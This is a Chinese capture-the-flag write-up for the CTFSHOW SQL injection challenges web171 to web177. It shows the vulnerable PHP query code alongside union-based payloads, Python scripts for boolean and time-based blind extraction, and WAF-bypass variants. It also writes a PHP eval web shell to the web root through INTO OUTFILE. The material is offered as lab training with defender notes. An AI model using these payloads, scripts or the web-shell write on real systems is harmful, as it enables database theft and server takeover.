CTFSHOW-web入门-sql注入

2021/8/25

web171

查库名

0' union select 1,database(),3 --+  //ctfshow_web

查表名

0' union select 1,group_concat(table_name),3  from information_schema.tables where table_schema=database() --+   //ctfshow_user

查列名

0' union select 1,group_concat(column_name),3  from information_schema.columns where table_name='ctfshow_user' --+   //id,username,password

查数据

0' union select id,username,password  from ctfshow_user --+     //flag

web172

// Concatenate the SQL statement to look up the user with the given ID.
// NOTE(review): $_GET['id'] is spliced straight into the query text with no
// escaping and no parameter binding, so the request controls the SQL that runs;
// the `username !='flag'` and `limit 1` clauses live in the same string and do
// not constrain a crafted id. A prepared statement with the id bound as a
// parameter is the fix; nothing in the check below compensates for it.
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";


// Check whether the result contains flag. This runs after the query, on the
// fetched row ($row is presumably the fetched result; it is defined outside this
// excerpt), so it is an output filter rather than input validation: it only
// hides a row whose username column is exactly 'flag'.
if($row->username!=='flag'){
$ret['msg']='查询成功';
}

要求username字段不能出现flag

查列数

1' order by 2 --+  //一共两列

查库名

0' union select 1,database() --+  //ctfshow_web

查表名

0' union select 1,group_concat(table_name)  from information_schema.tables where table_schema=database() --+   //ctfshow_user2

查数据

0' union select username,group_concat(password)  from ctfshow_user2 --+    //flag

0' union select hex(username),password from ctfshow_user2 --+ //flag

0' union select to_base64(username),password from ctfshow_user2 --+ //flag

web173

// Concatenate the SQL statement to look up the user with the given ID.
// NOTE(review): same defect as the web172 source — $_GET['id'] is concatenated
// into the query text unescaped and unbound. A prepared statement with a bound
// parameter is the fix.
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";


// Check whether the result contains flag. The check runs on the JSON-encoded
// result after the query has executed, so it is a case-insensitive substring
// denylist on the output, not input validation: it only matches the literal
// text 'flag' in the serialized response ($ret is built outside this excerpt).
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}

对返回的数据进行过滤

查列数

1' order by 3 --+  //一共两列

查库名

0' union select 1,database(),3 --+  //ctfshow_web

查表名

0' union select 1,group_concat(table_name),3  from information_schema.tables where table_schema=database() --+   //ctfshow_user3

查数据

0' union select username,group_concat(password),3  from ctfshow_user3 --+    //flag

0' union select hex(username),password,3 from ctfshow_user3 --+ //flag

0' union select to_base64(username),password,3 from ctfshow_user3 --+ //flag

2021/8/27

web174

// Concatenate the SQL statement to look up the user with the given ID.
// NOTE(review): $_GET['id'] is concatenated into the query text unescaped and
// unbound, exactly as in web172/web173; a prepared statement with a bound
// parameter is the fix.
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

// Check whether the result contains flag. Output denylist on the JSON-encoded
// result: the response is suppressed if it contains the literal text 'flag'
// (case-insensitive) or any decimal digit. It is applied after the query has
// run, so it limits what is echoed back, not what the query can execute.
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}

检测返回结果是否有flag和数字 如果存在就不输出

1' union select  replace(username,'g','a') ,'a' from ctfshow_user4 --+
方法一

查列数

1' order by 2 --+

查库名

0' union select 'a',database() --+   //ctfshow_web

查表名

0' union select 'a',replace(group_concat(table_name),'4','a') from information_schema.tables where table_schema=database() --+   //ctfshow_user4

这里已经知道了是4.....

查列名

0' union select 'a',group_concat(column_name)  from information_schema.columns where table_name='ctfshow_user4' --+ //id,username,password

查username值

0' union select to_base64(username),'password'  from ctfshow_user4 --+ //ZmxhZw== //flag

0' union select replace(username,'f','a'),'password' from ctfshow_user4 --+ //alag

查password值

0' union select replace(username,'f','a'),replace(replace(password,'0','a'),'1','b')  from ctfshow_user4 --+

0' union select replace(username,'f','a'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+


0' union select to_base64(username),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+

把字母变成数字

<?php
// Undo the digit encoding used in the query above: each digit 0-9 came back as
// the token numa..numj, so token numX maps to the index of X in 'abcdefghij'.
// Replacements run in the same a..j order as the original str_replace chain.
$flag='ctfshow{numeenumdnumhfnumhbnumf-anumbnumic-numenumhnumhd-numinumbnumjnuma-denumcnumhnumeanumcnumecnumdnumgnumh}';
foreach (str_split('abcdefghij') as $digit => $letter) {
    // 'num' . $letter is the encoded token; $digit (0..9) is its plain form.
    $flag = str_replace('num' . $letter, (string) $digit, $flag);
}
echo $flag;
?>
方法二

写文件方法 前提是设置了允许写文件

0' union select username,password from ctfshow_user4 into outfile '/var/www/html/1.txt' --+  //返回信息 Query OK, 1 row affected (0.01 sec)

0' union select 1,'<?php eval($_POST["5"]);?>' into outfile '/var/www/html/eval.php' %23
方法三

盲注

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/3/16 16:24
# blog: www.wlhhlc.top
#
# Boolean-based blind extraction for web174. The password never appears in a
# response body; the script only observes whether a marker string is present,
# which is why the output denylist in the challenge source has no effect on it.
# Defender note: each recovered character leaves up to len(dict) near-identical
# requests in the access log, differing only in the substr offset and the
# compared character — an easy pattern to alert on.
import requests
url = "http://151c9166-3b26-4211-8350-66208a82b250.challenge.ctf.show:8080/api/v4.php"
# Candidate alphabet, one request per candidate. Note: shadows the builtin dict.
dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = ""
# Password positions 1..49 (substr is 1-based). If no candidate matches at a
# position (a character outside the alphabet), nothing is appended and the
# position is silently skipped.
for i in range(1,50):
for j in dict:
# The injected condition holds only when character i of the password equals j.
payload = f"?id=1' and substr((select password from ctfshow_user4 where username=\"flag\"),{i},1)=\"{j}\"--+"
gloal = url + payload
res = requests.get(url=gloal)
# 'admin' is presumably part of the normal id=1 response — verify against the
# target; its presence is treated as "condition true".
if 'admin' in res.text:
flag += j
print(flag)
break
# -*- coding: utf-8 -*-
# @Author : Yn8rt
# @Time : 2021/7/25 17:17
# @Function:
# Boolean-based blind extraction for web174 using a binary search over the
# ASCII code of each character: about seven requests per character instead of
# one per candidate.
import requests
url = "http://151c9166-3b26-4211-8350-66208a82b250.challenge.ctf.show:8080/api/v4.php"
flag = ''

# NOTE(review): the range starts at 0, and substr(..., 0, 1) yields an empty
# string in MySQL (presumably the backend, given the information_schema /
# group_concat payloads), so ascii() of it is 0, every comparison is true, and
# the first appended character is chr(32) — a stray leading space.
for i in range(0,100): # one iteration per character position
max = 128 # exclusive upper bound of printable ASCII; shadows builtin max
min = 32  # lower bound; shadows builtin min
while 1:
mid = min+((max-min)//2) # floor division: round down to the nearest integer
# The search interval has collapsed to one value: mid is the character code.
if min==mid:
flag+=chr(mid)
print(flag)
break
# The injected if() makes the page echo 'yes' when ascii(char i) < mid and
# 'true' otherwise; the password itself is never returned.
payload="?id=' union select 'a'," \
"if(ascii(substr((select group_concat(password) " \
"from ctfshow_user4 where username='flag'),%d,1))<%d," \
"'yes','true')+--+"%(i,mid)
res = requests.get(url=url+payload).text
#print(res)
# Assumes 'yes' does not otherwise occur in the page — confirm for the target.
if "yes" in res:
max = mid
else:
min = mid
min  max  mid    
32 128 80

80 128 104


80 104 92


92 104 98

98 104 101

98 101 99


99 101 100


99 100 99
# Same template as in the script above with a different pair of marker strings
# ('small' / 'da'); the two %d slots are filled from (i, mid).
payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))<%d,'small','da')+--+"%(i,mid)
# The same payload with i=1 and mid=57 already substituted, shown for
# illustration. NOTE(review): the trailing %(i,mid) is left over from the
# template; with no %d left in the string, executing this line raises
# TypeError ("not all arguments converted").
payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),1,1))<57,'small','da')+--+"%(i,mid)

web175

// Concatenate the SQL statement to look up the user with the given ID.
// NOTE(review): the source shown here for web175 is identical to web174's:
// $_GET['id'] is concatenated into the query text unescaped and unbound.
// A prepared statement with a bound parameter is the fix.
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

// Check whether the result contains flag. Output denylist on the JSON-encoded
// result ('flag', case-insensitive, or any decimal digit), applied after the
// query has run; it limits what is echoed back, not what the query executes.
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
方法一
# -*- coding: utf-8 -*-
# @Author : Yn8rt
# @Time : 2021/7/25 17:17
# @Function:
# Time-based blind extraction for web175: the response content is never
# inspected, only the round-trip time of each request, with sleep(0.5) in the
# true branch acting as the oracle. Same binary search as the web174 script.
import requests
from time import time

url = "http://a2addd19-ec90-4350-b049-8cc20db4de09.challenge.ctf.show:8080/api/v5.php"
flag = ''

# NOTE(review): as in the web174 script, i starts at 0; substr(..., 0, 1) is an
# empty string in MySQL, so the first character appended is a stray chr(32).
for i in range(0, 100): # one iteration per character position
max = 128 # exclusive upper bound of printable ASCII; shadows builtin max
min = 32  # lower bound; shadows builtin min
while 1:
mid = min + ((max - min) // 2) # floor division: round down to the nearest integer
# The search interval has collapsed to one value: mid is the character code.
if min == mid:
flag += chr(mid)
print(flag)
break
# True branch (ascii(char i) < mid) delays the response by 0.5 s; the false
# branch returns immediately.
payload = "?id=' union select 'a'," \
"if(ascii(substr((select group_concat(password) " \
"from ctfshow_user5 where username='flag'),%d,1))<%d," \
"sleep(0.5),1)+--+" % (i, mid)

# Wall-clock time of the whole request (DNS, TCP, server), not just the sleep.
start_time=time()
res = requests.get(url=url + payload).text
end_time=time()
# print(res)

# 0.48 s threshold: any network delay above that on a "false" request is
# misclassified, and since no step is re-checked, one misclassification
# corrupts every later bound for that character. Defender note: bursts of
# requests whose query string contains sleep() and whose durations cluster at
# ~0.5 s are a clear slow-query-log / access-log signature.
if end_time-start_time>0.48 :
max = mid
else:
min = mid
方法二

写文件

0' union select username,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+  //返回信息 Query OK, 1 row affected (0.01 sec)

2021/9/3

web176

源码:

// Concatenate the SQL statement to look up the user with the given ID.
// NOTE(review): $_GET['id'] is still concatenated unescaped into the query text;
// waf() (defined below, body not shown) is presumably applied to the id before
// this point, but a bound parameter would make the id value inert regardless
// of what the filter removes.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";


// The incoming parameter is filtered.
// NOTE(review): the body is not shown, so what waf() actually removes cannot be
// stated from this excerpt; the payloads that follow indicate a narrow keyword
// denylist (mixed-case and comment-separated forms of the same keywords pass).
// Denylist filtering in front of string-built SQL is not a substitute for
// parameter binding.
function waf($str){
// Code too simple to be worth showing
}
方法一

查列数

1' order by 3 --+

查库名

0' unIoN SelEcT 1,database(),3 --+  //ctfshow_web

1' unIoN SelEcT 1,database(),3 --+ //ctfshow_web

查表名

0' unIoN SelEcT 1,group_concat(taBle_nAme),3 From infoRmaTion_schEma.taBles wHerE table_schema=database() --+  //ctfshow_user

查列名

0' unIoN SelEcT 1,group_concat(Column_nAme),3 From infoRmaTion_schEma.colUmns wHerE table_name='ctfshow_user' --+ //id,username,password



0' unIoN SelEcT 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user' --+ //id,username,password

查username值

0' unIoN SelEcT id,username,password From ctfshow_user --+ //flag

查password值

0' unIoN SelEcT id,username,password From ctfshow_user --+ //flag

貌似只过滤了 union select

方法二

万能密码

1' or 1=1 --+  //输出所有字段

web177

查列数

1'/**/order/**/by/**/3/**/%23

查库名

0'/**/union/**/select/**/1,database(),3/**/%23  //ctfshow_web

查表名

0'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/%23 //ctfshow_user

查列名

0'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='ctfshow_user'/**/%23 //id,username,password

查字段内容

0'/**/union/**/select/**/id,username,password/**/from/**/ctfshow_user/**/%23 //flag